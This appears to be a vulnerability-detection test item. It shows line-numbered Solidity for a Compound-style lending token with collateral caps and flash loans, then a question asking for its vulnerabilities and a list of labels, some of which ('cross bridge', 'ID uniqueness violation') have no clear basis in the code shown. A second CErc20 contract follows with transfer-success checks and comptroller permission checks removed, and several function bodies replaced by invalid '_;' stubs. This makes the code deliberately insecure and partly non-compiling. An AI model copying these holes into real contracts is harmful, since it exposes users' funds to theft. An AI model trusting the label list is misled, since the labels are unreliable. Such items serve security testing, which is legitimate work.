117      * @param newCollateralCap New collateral cap for this market. A value of 0 corresponds to no cap.
118      */
119     function _setCollateralCap(uint256 newCollateralCap) external {
120         require(msg.sender == admin, "admin only");

121         collateralCap = newCollateralCap;
122         emit NewCollateralCap(address(this), newCollateralCap);
123     }

124     /**
125      * @notice Absorb excess cash into reserves.
126      */
127     function gulp() external nonReentrant {
128         uint256 cashOnChain = getCashOnChain();
129         uint256 cashPrior = getCashPrior();

130         uint256 excessCash = sub_(cashOnChain, cashPrior);
131         totalReserves = add_(totalReserves, excessCash);
132         internalCash = cashOnChain;
133     }

134     /**
135      * @notice Get the max flash loan amount
136      */
137     function maxFlashLoan() external view returns (uint256) {
138         uint256 amount = 0;
139         if (
140             ComptrollerInterfaceExtension(address(comptroller)).flashloanAllowed(address(this), address(0), amount, "")
141         ) {
142             amount = getCashPrior();
143         }
144         return amount;
145     }

146     /**
147      * @notice Get the flash loan fees
148      * @param amount amount of token to borrow
149      */
150     function flashFee(uint256 amount) external view returns (uint256) {
151         require(
152             ComptrollerInterfaceExtension(address(comptroller)).flashloanAllowed(address(this), address(0), amount, ""),
153             "flashloan is paused"
154         );
155         return div_(mul_(amount, flashFeeBips), 10000);
156     }

157     /**
158      * @notice Flash loan funds to a given account.
159      * @param receiver The receiver address for the funds
160      * @param initiator flash loan initiator
161      * @param amount The amount of the funds to be loaned
162      * @param data The other data
163      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
164      */
165     function flashLoan(
166         ERC3156FlashBorrowerInterface receiver,
167         address initiator,
168         uint256 amount,
169         bytes calldata data
170     ) external nonReentrant returns (bool) {
171         require(amount > 0, "invalid flashloan amount");
172         accrueInterest();
173         require(
174             ComptrollerInterfaceExtension(address(comptroller)).flashloanAllowed(
175                 address(this),
176                 address(receiver),
177                 amount,
178                 data
179             ),
180             "flashloan is paused"
181         );
182         uint256 cashOnChainBefore = getCashOnChain();
183         uint256 cashBefore = getCashPrior();
184         require(cashBefore >= amount, "INSUFFICIENT_LIQUIDITY");

185         uint256 totalFee = this.flashFee(amount);

186         doTransferOut(address(uint160(address(receiver))), amount, false);

187         totalBorrows = add_(totalBorrows, amount);

         
188         uint256 repaymentAmount = add_(amount, totalFee);
189         doTransferIn(address(receiver), repaymentAmount, false);

190         uint256 cashOnChainAfter = getCashOnChain();

       
191         uint256 reservesFee = mul_ScalarTruncate(Exp({mantissa: reserveFactorMantissa}), totalFee);
192         totalReserves = add_(totalReserves, reservesFee);
193         internalCash = add_(cashBefore, totalFee);
194         totalBorrows = sub_(totalBorrows, amount);

195         emit Flashloan(address(receiver), amount, totalFee, reservesFee);
196         return true;
197     }

198     /**
199      * @notice Register account collateral tokens if there is space.
200      * @param account The account to register
201      * @dev This function could only be called by comptroller.
202      * @return The actual registered amount of collateral
203      */
204     function registerCollateral(address account) external returns (uint256) {
205         // Make sure accountCollateralTokens of `account` is initialized.
206         initializeAccountCollateralTokens(account);
        
207         uint256 amount = sub_(accountTokens[account], accountCollateralTokens[account]);
208         return increaseUserCollateralInternal(account, amount);
209     }

210     /**
211      * @notice Unregister account collateral tokens if the account still has enough collateral.
212      * @dev This function could only be called by comptroller.
213      * @param account The account to unregister
214      */
215     function unregisterCollateral(address account) external {
216         // Make sure accountCollateralTokens of `account` is initialized.
217         initializeAccountCollateralTokens(account);

218         require(
219             comptroller.redeemAllowed(address(this), account, accountCollateralTokens[account]) == 0,
220             "comptroller rejection"
221         );

222         decreaseUserCollateralInternal(account, accountCollateralTokens[account]);
223     }

224     /*** Safe Token ***/

225     /**
226      * @notice Gets internal balance of this contract in terms of the underlying.
227      *  It excludes balance from direct transfer.
228      * @dev This excludes the value of the current message, if any
229      * @return The quantity of underlying tokens owned by this contract
230      */
231     function getCashPrior() internal view returns (uint256) {
232         return internalCash;
233     }

234     /**
235      * @notice Gets total balance of this contract in terms of the underlying
236      * @dev This excludes the value of the current message, if any
237      * @return The quantity of underlying tokens owned by this contract
238      */
239     function getCashOnChain() internal view returns (uint256) {
240         EIP20Interface token = EIP20Interface(underlying);
241         return token.balanceOf(address(this));
242     }

243     /**
244      * @notice Initialize the account's collateral tokens. This function should be called in the beginning of every function
245      *  that accesses accountCollateralTokens or accountTokens.
246      * @param account The account of accountCollateralTokens that needs to be updated
247      */
248     function initializeAccountCollateralTokens(address account) internal {
249         /**
250          * If isCollateralTokenInit is false, it means accountCollateralTokens was not initialized yet.
251          * This case will only happen once and must be the very beginning. accountCollateralTokens is a new structure and its
252          * initial value should be equal to accountTokens if user has entered the market. However, it's almost impossible to
253          * check every user's value when the implementation becomes active. Therefore, it must rely on every action which will
254          * access accountTokens to call this function to check if accountCollateralTokens needed to be initialized.
255          */
256         if (!isCollateralTokenInit[account]) {
257             if (ComptrollerInterfaceExtension(address(comptroller)).checkMembership(account, CToken(this))) {
258                 accountCollateralTokens[account] = accountTokens[account];
259                 totalCollateralTokens = add_(totalCollateralTokens, accountTokens[account]);

260                 emit UserCollateralChanged(account, accountCollateralTokens[account]);
261             }
262             isCollateralTokenInit[account] = true;
263         }
264     }

265     /**
266      * @dev Similar to EIP20 transfer, except it handles a False result from `transferFrom` and reverts in that case.
267      *      This will revert due to insufficient balance or insufficient allowance.
268      *      This function returns the actual amount received,
269      *      which may be less than `amount` if there is a fee attached to the transfer.
270      *
271      *      Note: This wrapper safely handles non-standard ERC-20 tokens that do not return a value.
272      *            See here: https://medium.com/coinmonks/missing-return-value-bug-at-least-130-tokens-affected-d67bf08521ca
273      */
274     function doTransferIn(
275         address from,
276         uint256 amount,
277         bool isNative
278     ) internal returns (uint256) {
279         isNative; // unused

280         EIP20NonStandardInterface token = EIP20NonStandardInterface(underlying);
281         uint256 balanceBefore = EIP20Interface(underlying).balanceOf(address(this));
282         token.transferFrom(from, address(this), amount);

283         bool success;
284         assembly {
285             switch returndatasize()
286             case 0 {
287                 // This is a non-standard ERC-20
288                 success := not(0) // set success to true
289             }
290             case 32 {
291                 // This is a compliant ERC-20
292                 returndatacopy(0, 0, 32)
293                 success := mload(0) // Set `success = returndata` of external call
294             }
295             default {
296                 // This is an excessively non-compliant ERC-20, revert.
297                 revert(0, 0)
298             }
299         }
300         require(success, "TOKEN_TRANSFER_IN_FAILED");

301         // Calculate the amount that was *actually* transferred
302         uint256 balanceAfter = EIP20Interface(underlying).balanceOf(address(this));
303         uint256 transferredIn = sub_(balanceAfter, balanceBefore);
304         internalCash = add_(internalCash, transferredIn);
305         return transferredIn;
306     }

307     /**
308      * @dev Similar to EIP20 transfer, except it handles a False success from `transfer` and returns an explanatory
309      *      error code rather than reverting. If caller has not called checked protocol's balance, this may revert due to
310      *      insufficient cash held in this contract. If caller has checked protocol's balance prior to this call, and verified
311      *      it is >= amount, this should not revert in normal conditions.
312      *
313      *      Note: This wrapper safely handles non-standard ERC-20 tokens that do not return a value.
314      *            See here: https://medium.com/coinmonks/missing-return-value-bug-at-least-130-tokens-affected-d67bf08521ca
315      */
316     function doTransferOut(
317         address payable to,
318         uint256 amount,
319         bool isNative
320     ) internal {
321         isNative; // unused

322         EIP20NonStandardInterface token = EIP20NonStandardInterface(underlying);
323         token.transfer(to, amount);

324         bool success;
325         assembly {
326             switch returndatasize()
327             case 0 {
328                 // This is a non-standard ERC-20
329                 success := not(0) // set success to true
330             }
331             case 32 {
332                 // This is a complaint ERC-20
333                 returndatacopy(0, 0, 32)
334                 success := mload(0) // Set `success = returndata` of external call
335             }
336             default {
337                 // This is an excessively non-compliant ERC-20, revert.
338                 revert(0, 0)
339             }
340         }
341         require(success, "TOKEN_TRANSFER_OUT_FAILED");
342         internalCash = sub_(internalCash, amount);
343     }

344     /**
345      * @notice Transfer `tokens` tokens from `src` to `dst` by `spender`
346      * @dev Called by both `transfer` and `transferFrom` internally
347      * @param spender The address of the account performing the transfer
348      * @param src The address of the source account
349      * @param dst The address of the destination account
350      * @param tokens The number of tokens to transfer
351      * @return Whether or not the transfer succeeded
352      */
353     function transferTokens(
354         address spender,
355         address src,
356         address dst,
357         uint256 tokens
358     ) internal returns (uint256) {
359         // Make sure accountCollateralTokens of `src` and `dst` are initialized.
360         initializeAccountCollateralTokens(src);
361         initializeAccountCollateralTokens(dst);

362         /**
363          * For every user, accountTokens must be greater than or equal to accountCollateralTokens.
364          * The buffer between the two values will be transferred first.
365          * bufferTokens = accountTokens[src] - accountCollateralTokens[src]
366          * collateralTokens = tokens - bufferTokens
367          */
368         uint256 bufferTokens = sub_(accountTokens[src], accountCollateralTokens[src]);
369         uint256 collateralTokens = 0;
370         if (tokens > bufferTokens) {
371             collateralTokens = tokens - bufferTokens;
372         }

373         /**
374          * Since bufferTokens are not collateralized and can be transferred freely, we only check with comptroller
375          * whether collateralized tokens can be transferred.
376          */
377         require(comptroller.transferAllowed(address(this), src, dst, collateralTokens) == 0, "comptroller rejection");

378         /* Do not allow self-transfers */
379         require(src != dst, "bad input");

380         /* Get the allowance, infinite for the account owner */
381         uint256 startingAllowance = 0;
382         if (spender == src) {
383             startingAllowance = uint256(-1);
384         } else {
385             startingAllowance = transferAllowances[src][spender];
386         }

387         /* Do the calculations, checking for {under,over}flow */
388         accountTokens[src] = sub_(accountTokens[src], tokens);
389         accountTokens[dst] = add_(accountTokens[dst], tokens);
390         if (collateralTokens > 0) {
391             accountCollateralTokens[src] = sub_(accountCollateralTokens[src], collateralTokens);
392             accountCollateralTokens[dst] = add_(accountCollateralTokens[dst], collateralTokens);

393             emit UserCollateralChanged(src, accountCollateralTokens[src]);
394             emit UserCollateralChanged(dst, accountCollateralTokens[dst]);
395         }

396         /* Eat some of the allowance (if necessary) */
397         if (startingAllowance != uint256(-1)) {
398             transferAllowances[src][spender] = sub_(startingAllowance, tokens);
399         }

400         /* We emit a Transfer event */
401         emit Transfer(src, dst, tokens);

402         comptroller.transferVerify(address(this), src, dst, tokens);

403         return uint256(Error.NO_ERROR);
404     }

405     /**
406      * @notice Get the account's cToken balances
407      * @param account The address of the account
408      */
409     function getCTokenBalanceInternal(address account) internal view returns (uint256) {
410         if (isCollateralTokenInit[account]) {
411             return accountCollateralTokens[account];
412         } else {
413             /**
414              * If the value of accountCollateralTokens was not initialized, we should return the value of accountTokens.
415              */
416             return accountTokens[account];
417         }
418     }

419     /**
420      * @notice Increase user's collateral. Increase as much as we can.
421      * @param account The address of the account
422      * @param amount The amount of collateral user wants to increase
423      * @return The actual increased amount of collateral
424      */
425     function increaseUserCollateralInternal(address account, uint256 amount) internal returns (uint256) {
426         uint256 totalCollateralTokensNew = add_(totalCollateralTokens, amount);
427         if (collateralCap == 0 || (collateralCap != 0 && totalCollateralTokensNew <= collateralCap)) {
428             // 1. If collateral cap is not set,
429             // 2. If collateral cap is set but has enough space for this user,
430             // give all the user needs.
431             totalCollateralTokens = totalCollateralTokensNew;
432             accountCollateralTokens[account] = add_(accountCollateralTokens[account], amount);

433             emit UserCollateralChanged(account, accountCollateralTokens[account]);
434             return amount;
435         } else if (collateralCap > totalCollateralTokens) {
436             // If the collateral cap is set but the remaining cap is not enough for this user,
437             // give the remaining parts to the user.
438             uint256 gap = sub_(collateralCap, totalCollateralTokens);
439             totalCollateralTokens = add_(totalCollateralTokens, gap);
440             accountCollateralTokens[account] = add_(accountCollateralTokens[account], gap);

441             emit UserCollateralChanged(account, accountCollateralTokens[account]);
442             return gap;
443         }
444         return 0;
445     }

446     /**
447      * @notice Decrease user's collateral. Reject if the amount can't be fully decrease.
448      * @param account The address of the account
449      * @param amount The amount of collateral user wants to decrease
450      */
451     function decreaseUserCollateralInternal(address account, uint256 amount) internal {
452         /*
453          * Return if amount is zero.
454          * Put behind `redeemAllowed` for accuring potential COMP rewards.
455          */
456         if (amount == 0) {
457             return;
458         }

459         totalCollateralTokens = sub_(totalCollateralTokens, amount);
460         accountCollateralTokens[account] = sub_(accountCollateralTokens[account], amount);

461         emit UserCollateralChanged(account, accountCollateralTokens[account]);
462     }

463     struct MintLocalVars {
464         uint256 exchangeRateMantissa;
465         uint256 mintTokens;
466         uint256 actualMintAmount;
467     }

468     /**
469      * @notice User supplies assets into the market and receives cTokens in exchange
470      * @dev Assumes interest has already been accrued up to the current block
471      * @param minter The address of the account which is supplying the assets
472      * @param mintAmount The amount of the underlying asset to supply
473      * @param isNative The amount is in native or not
474      * @return (uint, uint) An error code (0=success, otherwise a failure, see ErrorReporter.sol), and the actual mint amount.
475      */
476     function mintFresh(
477         address minter,
478         uint256 mintAmount,
479         bool isNative
480     ) internal returns (uint256, uint256) {
481         // Make sure accountCollateralTokens of `minter` is initialized.
482         initializeAccountCollateralTokens(minter);

483         /* Fail if mint not allowed */
484         require(comptroller.mintAllowed(address(this), minter, mintAmount) == 0, "comptroller rejection");

485         /*
486          * Return if mintAmount is zero.
487          * Put behind `mintAllowed` for accuring potential COMP rewards.
488          */
489         if (mintAmount == 0) {
490             return (uint256(Error.NO_ERROR), 0);
491         }

  
492         MintLocalVars memory vars;

493         vars.exchangeRateMantissa = exchangeRateStoredInternal();

494         /////////////////////////
495         // EFFECTS & INTERACTIONS
496         // (No safe failures beyond this point)

497         /*
498          *  We call `doTransferIn` for the minter and the mintAmount.
499          *  Note: The cToken must handle variations between ERC-20 and ETH underlying.
500          *  `doTransferIn` reverts if anything goes wrong, since we can't be sure if
501          *  side-effects occurred. The function returns the amount actually transferred,
502          *  in case of a fee. On success, the cToken holds an additional `actualMintAmount`
503          *  of cash.
504          */
505         vars.actualMintAmount = doTransferIn(minter, mintAmount, isNative);

506         /*
507          * We get the current exchange rate and calculate the number of cTokens to be minted:
508          *  mintTokens = actualMintAmount / exchangeRate
509          */
510         vars.mintTokens = div_ScalarByExpTruncate(vars.actualMintAmount, Exp({mantissa: vars.exchangeRateMantissa}));

511         /*
512          * We calculate the new total supply of cTokens and minter token balance, checking for overflow:
513          *  totalSupply = totalSupply + mintTokens
514          *  accountTokens[minter] = accountTokens[minter] + mintTokens
515          */
516         totalSupply = add_(totalSupply, vars.mintTokens);
517         accountTokens[minter] = add_(accountTokens[minter], vars.mintTokens);

518         /*
519          * We only allocate collateral tokens if the minter has entered the market.
520          */
521         if (ComptrollerInterfaceExtension(address(comptroller)).checkMembership(minter, CToken(this))) {
522             increaseUserCollateralInternal(minter, vars.mintTokens);
523         }

524         /* We emit a Mint event, and a Transfer event */
525         emit Mint(minter, vars.actualMintAmount, vars.mintTokens);
526         emit Transfer(address(this), minter, vars.mintTokens);

527         /* We call the defense hook */
528         comptroller.mintVerify(address(this), minter, vars.actualMintAmount, vars.mintTokens);

529         return (uint256(Error.NO_ERROR), vars.actualMintAmount);
530     }

531     struct RedeemLocalVars {
532         uint256 exchangeRateMantissa;
533         uint256 redeemTokens;
534         uint256 redeemAmount;
535     }

536     /**
537      * @notice User redeems cTokens in exchange for the underlying asset
538      * @dev Assumes interest has already been accrued up to the current block. Only one of redeemTokensIn or redeemAmountIn may be non-zero and it would do nothing if both are zero.
539      * @param redeemer The address of the account which is redeeming the tokens
540      * @param redeemTokensIn The number of cTokens to redeem into underlying
541      * @param redeemAmountIn The number of underlying tokens to receive from redeeming cTokens
542      * @param isNative The amount is in native or not
543      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
544      */
545     function redeemFresh(
546         address payable redeemer,
547         uint256 redeemTokensIn,
548         uint256 redeemAmountIn,
549         bool isNative
550     ) internal returns (uint256) {
551         // Make sure accountCollateralTokens of `redeemer` is initialized.
552         initializeAccountCollateralTokens(redeemer);     

553         RedeemLocalVars memory vars;

554         /* exchangeRate = invoke Exchange Rate Stored() */
555         vars.exchangeRateMantissa = exchangeRateStoredInternal();

556         /* If redeemTokensIn > 0: */
557         if (redeemTokensIn > 0) {
558             /*
559              * We calculate the exchange rate and the amount of underlying to be redeemed:
560              *  redeemTokens = redeemTokensIn
561              *  redeemAmount = redeemTokensIn x exchangeRateCurrent
562              */
563             vars.redeemTokens = redeemTokensIn;
564             vars.redeemAmount = mul_ScalarTruncate(Exp({mantissa: vars.exchangeRateMantissa}), redeemTokensIn);
565         } else {
566             /*
567              * We get the current exchange rate and calculate the amount to be redeemed:
568              *  redeemTokens = redeemAmountIn / exchangeRate
569              *  redeemAmount = redeemAmountIn
570              */
571             vars.redeemTokens = div_ScalarByExpTruncate(redeemAmountIn, Exp({mantissa: vars.exchangeRateMantissa}));
572             vars.redeemAmount = redeemAmountIn;
573         }

574         /**
575          * For every user, accountTokens must be greater than or equal to accountCollateralTokens.
576          * The buffer between the two values will be redeemed first.
577          * bufferTokens = accountTokens[redeemer] - accountCollateralTokens[redeemer]
578          * collateralTokens = redeemTokens - bufferTokens
579          */
580         uint256 bufferTokens = sub_(accountTokens[redeemer], accountCollateralTokens[redeemer]);
581         uint256 collateralTokens = 0;
582         if (vars.redeemTokens > bufferTokens) {
583             collateralTokens = vars.redeemTokens - bufferTokens;
584         }
 
585         /* Verify market's block number equals current block number */
586         require(accrualBlockNumber == getBlockNumber(), "market not fresh");

      
587         /////////////////////////
588         // EFFECTS & INTERACTIONS
589         // (No safe failures beyond this point)

590         /*
591          * We calculate the new total supply and redeemer balance, checking for underflow:
592          *  totalSupplyNew = totalSupply - redeemTokens
593          *  accountTokensNew = accountTokens[redeemer] - redeemTokens
594          */
595         totalSupply = sub_(totalSupply, vars.redeemTokens);
596         accountTokens[redeemer] = sub_(accountTokens[redeemer], vars.redeemTokens);

597         /*
598          * We only deallocate collateral tokens if the redeemer needs to redeem them.
599          */
600         decreaseUserCollateralInternal(redeemer, collateralTokens);

601         /*
602          * We invoke doTransferOut for the redeemer and the redeemAmount.
603          *  Note: The cToken must handle variations between ERC-20 and ETH underlying.
604          *  On success, the cToken has redeemAmount less of cash.
605          *  doTransferOut reverts if anything goes wrong, since we can't be sure if side effects occurred.
606          */
607         doTransferOut(redeemer, vars.redeemAmount, isNative);

608         /* We emit a Transfer event, and a Redeem event */
609         emit Transfer(redeemer, address(this), vars.redeemTokens);
610         emit Redeem(redeemer, vars.redeemAmount, vars.redeemTokens);

611         /* We call the defense hook */
612         comptroller.redeemVerify(address(this), redeemer, vars.redeemAmount, vars.redeemTokens);

613         return uint256(Error.NO_ERROR);
614     }

615     /**
616      * @notice Transfers collateral tokens (this market) to the liquidator.
617      * @dev Called only during an in-kind liquidation, or by liquidateBorrow during the liquidation of another CToken.
618      *  Its absolutely critical to use msg.sender as the seizer cToken and not a parameter.
619      * @param seizerToken The contract seizing the collateral (i.e. borrowed cToken)
620      * @param liquidator The account receiving seized collateral
621      * @param borrower The account having collateral seized
622      * @param seizeTokens The number of cTokens to seize
623      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
624      */
625     function seizeInternal(
626         address seizerToken,
627         address liquidator,
628         address borrower,
629         uint256 seizeTokens
630     ) internal returns (uint256) {
631         // Make sure accountCollateralTokens of `liquidator` and `borrower` are initialized.
632         initializeAccountCollateralTokens(liquidator);
633         initializeAccountCollateralTokens(borrower);

634         /* Fail if seize not allowed */
635         require(
636             comptroller.seizeAllowed(address(this), seizerToken, liquidator, borrower, seizeTokens) == 0,
637             "comptroller rejection"
638         );

639         /*
640          * Return if seizeTokens is zero.
641          * Put behind `seizeAllowed` for accuring potential COMP rewards.
642          */
643         if (seizeTokens == 0) {
644             return uint256(Error.NO_ERROR);
645         }

646         /* Fail if borrower = liquidator */
647         require(borrower != liquidator, "invalid account pair");

648         /*
649          * We calculate the new borrower and liquidator token balances and token collateral balances, failing on underflow/overflow:
650          *  accountTokens[borrower] = accountTokens[borrower] - seizeTokens
651          *  accountTokens[liquidator] = accountTokens[liquidator] + seizeTokens
652          *  accountCollateralTokens[borrower] = accountCollateralTokens[borrower] - seizeTokens
653          *  accountCollateralTokens[liquidator] = accountCollateralTokens[liquidator] + seizeTokens
654          */
655         accountTokens[borrower] = sub_(accountTokens[borrower], seizeTokens);
656         accountTokens[liquidator] = add_(accountTokens[liquidator], seizeTokens);
657         accountCollateralTokens[borrower] = sub_(accountCollateralTokens[borrower], seizeTokens);
658         accountCollateralTokens[liquidator] = add_(accountCollateralTokens[liquidator], seizeTokens);

659         /* Emit a Transfer, UserCollateralChanged events */
660         emit Transfer(borrower, liquidator, seizeTokens);
661         emit UserCollateralChanged(borrower, accountCollateralTokens[borrower]);
662         emit UserCollateralChanged(liquidator, accountCollateralTokens[liquidator]);

663         /* We call the defense hook */
664         comptroller.seizeVerify(address(this), seizerToken, liquidator, borrower, seizeTokens);

665         return uint256(Error.NO_ERROR);
666     }
667 }
What are the vulnerabilities in the contract?
cross bridge
inconsistent state update 
ID uniqueness violation
arithmetic flaw
<end of text>
1 pragma solidity ^0.5.16;

2 import "./CToken.sol";

3 /**
4  * @title Compound's CErc20 Contract
5  * @notice CTokens which wrap an EIP-20 underlying
6  * @author Compound
7  */
8 contract CErc20 is CToken, CErc20Interface {
9     /**
10      * @notice Initialize the new money market
11      * @param underlying_ The address of the underlying asset
12      * @param comptroller_ The address of the Comptroller
13      * @param interestRateModel_ The address of the interest rate model
14      * @param initialExchangeRateMantissa_ The initial exchange rate, scaled by 1e18
15      * @param name_ ERC-20 name of this token
16      * @param symbol_ ERC-20 symbol of this token
17      * @param decimals_ ERC-20 decimal precision of this token
18      */
19     function initialize(
20         address underlying_,
21         ComptrollerInterface comptroller_,
22         InterestRateModel interestRateModel_,
23         uint256 initialExchangeRateMantissa_,
24         string memory name_,
25         string memory symbol_,
26         uint8 decimals_
27     ) public {
28         // CToken initialize does the bulk of the work
29         super.initialize(comptroller_, interestRateModel_, initialExchangeRateMantissa_, name_, symbol_, decimals_);

30         // Set underlying and sanity check it
31         underlying = underlying_;
32         EIP20Interface(underlying).totalSupply();
33     }

34     /*** User Interface ***/

35     /**
36      * @notice Sender supplies assets into the market and receives cTokens in exchange
37      * @dev Accrues interest whether or not the operation succeeds, unless reverted
38      * @param mintAmount The amount of the underlying asset to supply
39      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
40      */
41     function mint(uint256 mintAmount) external returns (uint256) {
42         (uint256 err, ) = mintInternal(mintAmount, false);
       
43     }

44     /**
45      * @notice Sender redeems cTokens in exchange for the underlying asset
46      * @dev Accrues interest whether or not the operation succeeds, unless reverted
47      * @param redeemTokens The number of cTokens to redeem into underlying
48      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
49      */
50     function redeem(uint256 redeemTokens) external returns (uint256) {
51        _;
52     }

53     /**
54      * @notice Sender redeems cTokens in exchange for a specified amount of underlying asset
55      * @dev Accrues interest whether or not the operation succeeds, unless reverted
56      * @param redeemAmount The amount of underlying to redeem
57      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
58      */
59     function redeemUnderlying(uint256 redeemAmount) external returns (uint256) {
60             _;
61     }

62     /**
63      * @notice Sender borrows assets from the protocol to their own address
64      * @param borrowAmount The amount of the underlying asset to borrow
65      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
66      */
67     function borrow(uint256 borrowAmount) external returns (uint256) {
68          _;
69     }

70     /**
71      * @notice Sender repays their own borrow
72      * @param repayAmount The amount to repay
73      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
74      */
75     function repayBorrow(uint256 repayAmount) external returns (uint256) {
76         (uint256 err, ) = repayBorrowInternal(repayAmount, false);
       
77     }

78     /**
79      * @notice Sender repays a borrow belonging to borrower
80      * @param borrower the account with the debt being payed off
81      * @param repayAmount The amount to repay
82      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
83      */
84     function repayBorrowBehalf(address borrower, uint256 repayAmount) external returns (uint256) {
85         (uint256 err, ) = repayBorrowBehalfInternal(borrower, repayAmount, false);        
86     }

87     /**
88      * @notice The sender liquidates the borrowers collateral.
89      *  The collateral seized is transferred to the liquidator.
90      * @param borrower The borrower of this cToken to be liquidated
91      * @param repayAmount The amount of the underlying borrowed asset to repay
92      * @param cTokenCollateral The market in which to seize collateral from the borrower
93      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
94      */
95     function liquidateBorrow(
96         address borrower,
97         uint256 repayAmount,
98         CTokenInterface cTokenCollateral
99     ) external returns (uint256) {
100         (uint256 err, ) = liquidateBorrowInternal(borrower, repayAmount, cTokenCollateral, false);
       
101     }

102     /**
103      * @notice The sender adds to reserves.
104      * @param addAmount The amount fo underlying token to add as reserves
105      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
106      */
107     function _addReserves(uint256 addAmount) external returns (uint256) {
108         _;
109     }

110     /*** Safe Token ***/

111     /**
112      * @notice Gets balance of this contract in terms of the underlying
113      * @dev This excludes the value of the current message, if any
114      * @return The quantity of underlying tokens owned by this contract
115      */
116     function getCashPrior() internal view returns (uint256) {
117         EIP20Interface token = EIP20Interface(underlying);
118         return token.balanceOf(address(this));
119     }

120     /**
121      * @dev Similar to EIP20 transfer, except it handles a False result from `transferFrom` and reverts in that case.
122      *      This will revert due to insufficient balance or insufficient allowance.
123      *      This function returns the actual amount received,
124      *      which may be less than `amount` if there is a fee attached to the transfer.
125      *
126      *      Note: This wrapper safely handles non-standard ERC-20 tokens that do not return a value.
127      *            See here: https://medium.com/coinmonks/missing-return-value-bug-at-least-130-tokens-affected-d67bf08521ca
128      */
129     function doTransferIn(
130         address from,
131         uint256 amount,
132         bool isNative
133     ) internal returns (uint256) {
134         isNative; // unused

135         EIP20NonStandardInterface token = EIP20NonStandardInterface(underlying);
136         uint256 balanceBefore = EIP20Interface(underlying).balanceOf(address(this));
137         token.transferFrom(from, address(this), amount);

138         bool success;
139         assembly {
140             switch returndatasize()
141             case 0 {
142                 // This is a non-standard ERC-20
143                 success := not(0) // set success to true
144             }
145             case 32 {
146                 // This is a compliant ERC-20
147                 returndatacopy(0, 0, 32)
148                 success := mload(0) // Set `success = returndata` of external call
149             }
150             default {
151                 // This is an excessively non-compliant ERC-20, revert.
152                 revert(0, 0)
153             }
154         }       

155         // Calculate the amount that was *actually* transferred
156         uint256 balanceAfter = EIP20Interface(underlying).balanceOf(address(this));
157         return sub_(balanceAfter, balanceBefore);
158     }

159     /**
160      * @dev Similar to EIP20 transfer, except it handles a False success from `transfer` and returns an explanatory
161      *      error code rather than reverting. If caller has not called checked protocol's balance, this may revert due to
162      *      insufficient cash held in this contract. If caller has checked protocol's balance prior to this call, and verified
163      *      it is >= amount, this should not revert in normal conditions.
164      *
165      *      Note: This wrapper safely handles non-standard ERC-20 tokens that do not return a value.
166      *            See here: https://medium.com/coinmonks/missing-return-value-bug-at-least-130-tokens-affected-d67bf08521ca
167      */
168     function doTransferOut(
169         address payable to,
170         uint256 amount,
171         bool isNative
172     ) internal {
173         isNative; // unused

174         EIP20NonStandardInterface token = EIP20NonStandardInterface(underlying);
175         token.transfer(to, amount);

176         bool success;
177         assembly {
178             switch returndatasize()
179             case 0 {
180                 // This is a non-standard ERC-20
181                 success := not(0) // set success to true
182             }
183             case 32 {
184                 // This is a complaint ERC-20
185                 returndatacopy(0, 0, 32)
186                 success := mload(0) // Set `success = returndata` of external call
187             }
188             default {
189                 // This is an excessively non-compliant ERC-20, revert.
190                 revert(0, 0)
191             }
192         }
193     }

194     /**
195      * @notice Transfer `tokens` tokens from `src` to `dst` by `spender`
196      * @dev Called by both `transfer` and `transferFrom` internally
197      * @param spender The address of the account performing the transfer
198      * @param src The address of the source account
199      * @param dst The address of the destination account
200      * @param tokens The number of tokens to transfer
201      * @return Whether or not the transfer succeeded
202      */
203     function transferTokens(
204         address spender,
205         address src,
206         address dst,
207         uint256 tokens
208     ) internal returns (uint256) {
209         /* Fail if transfer not allowed */
        
   
210         /* Get the allowance, infinite for the account owner */
211         uint256 startingAllowance = 0;
212         if (spender == src) {
213             startingAllowance = uint256(-1);
214         } else {
215             startingAllowance = transferAllowances[src][spender];
216         }

217         /* Do the calculations, checking for {under,over}flow */
218         accountTokens[src] = sub_(accountTokens[src], tokens);
219         accountTokens[dst] = add_(accountTokens[dst], tokens);

220         /* Eat some of the allowance (if necessary) */
221         if (startingAllowance != uint256(-1)) {
222             transferAllowances[src][spender] = sub_(startingAllowance, tokens);
223         }

224         /* We emit a Transfer event */
225         emit Transfer(src, dst, tokens);

226         comptroller.transferVerify(address(this), src, dst, tokens);

227         return uint256(Error.NO_ERROR);
228     }

229     /**
230      * @notice Get the account's cToken balances
231      * @param account The address of the account
232      */
233     function getCTokenBalanceInternal(address account) internal view returns (uint256) {
234         return accountTokens[account];
235     }

236     struct MintLocalVars {
237         uint256 exchangeRateMantissa;
238         uint256 mintTokens;
239         uint256 actualMintAmount;
240     }

241     /**
242      * @notice User supplies assets into the market and receives cTokens in exchange
243      * @dev Assumes interest has already been accrued up to the current block
244      * @param minter The address of the account which is supplying the assets
245      * @param mintAmount The amount of the underlying asset to supply
246      * @param isNative The amount is in native or not
247      * @return (uint, uint) An error code (0=success, otherwise a failure, see ErrorReporter.sol), and the actual mint amount.
248      */
249     function mintFresh(
250         address minter,
251         uint256 mintAmount,
252         bool isNative
253     ) internal returns (uint256, uint256) {

254         /*
255          * Return if mintAmount is zero.
256          * Put behind `mintAllowed` for accuring potential COMP rewards.
257          */
258         if (mintAmount == 0) {
259             return (uint256(Error.NO_ERROR), 0);
260         }

      

261         MintLocalVars memory vars;

262         vars.exchangeRateMantissa = exchangeRateStoredInternal();

263         /////////////////////////
264         // EFFECTS & INTERACTIONS
265         // (No safe failures beyond this point)

266         /*
267          *  We call `doTransferIn` for the minter and the mintAmount.
268          *  Note: The cToken must handle variations between ERC-20 and ETH underlying.
269          *  `doTransferIn` reverts if anything goes wrong, since we can't be sure if
270          *  side-effects occurred. The function returns the amount actually transferred,
271          *  in case of a fee. On success, the cToken holds an additional `actualMintAmount`
272          *  of cash.
273          */
274         vars.actualMintAmount = doTransferIn(minter, mintAmount, isNative);

275         /*
276          * We get the current exchange rate and calculate the number of cTokens to be minted:
